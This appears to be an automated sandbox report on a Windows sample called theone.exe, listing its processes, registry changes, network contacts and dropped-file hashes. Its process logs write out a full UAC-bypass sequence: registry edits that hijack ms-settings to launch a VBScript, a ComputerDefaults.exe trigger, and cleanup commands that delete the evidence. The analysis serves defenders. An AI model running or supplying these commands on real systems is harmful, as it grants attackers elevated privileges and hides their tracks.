Malware Analysis Report

2024-12-07 16:24

Sample ID 241113-y4n8assjcq
Target theone.exe
SHA256 8101b388cc8a6a9c948f8d71de9938702b5c25978d804769c8c20fe258adc959
Tags
defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

8101b388cc8a6a9c948f8d71de9938702b5c25978d804769c8c20fe258adc959

Threat Level: Shows suspicious behavior

The file theone.exe was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Indicator Removal: File Deletion

Enumerates physical storage devices

Unsigned PE

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 20:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 20:20

Reported

2024-11-13 20:25

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\151417.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\832544.vbs" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command\DelegateExecute C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\ms-settings\Shell C:\Windows\system32\reg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2764 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2776 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2776 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2776 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2964 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2964 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2804 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2804 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2804 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2764 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2528 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2528 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2516 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2516 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2516 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2912 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2912 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2764 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2824 wrote to memory of 2904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2824 wrote to memory of 2904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2824 wrote to memory of 2904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2764 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 3044 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3044 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3044 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\theone.exe

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\832544.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\832544.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\832544.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\151417.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\151417.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\151417.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp

Files

memory/2764-0-0x00000000002E0000-0x00000000002E1000-memory.dmp

memory/2764-1-0x0000000000300000-0x0000000000301000-memory.dmp

memory/2764-2-0x0000000000340000-0x0000000000341000-memory.dmp

memory/2764-4-0x0000000002220000-0x0000000002221000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\832544.vbs

MD5 8b4ed5c47fdddbeba260ef11cfca88c6
SHA1 868f11f8ed78ebe871f9da182d053f349834b017
SHA256 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA512 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

C:\Users\Admin\AppData\Local\Temp\Cab7503.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar7516.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\151417.vbs

MD5 d07a7732bcf62268641e29fb058d9540
SHA1 ec37e3c1602cecc5b13c08c97821b9d59fb65691
SHA256 f625f2b2b653af0f55629216f442a68ee55d9a2a268d6f1b5cb41b4c843f3dca
SHA512 3be09edab7de4ea2e5e2d0ba4c0f7092af1b1618f9dd1f427aa4d8f5cb457a18667f073d255e0e9a170a0b5b7269c0bd7e4b63f77b8366bef42b1a263576bf2c

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 20:20

Reported

2024-11-13 20:21

Platform

win10v2004-20241007-en

Max time kernel

48s

Max time network

33s

Command Line

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\DxumhqCmD1wGZmjQzSLMX006.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\190205.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Windows\system32\taskmgr.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\90218.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
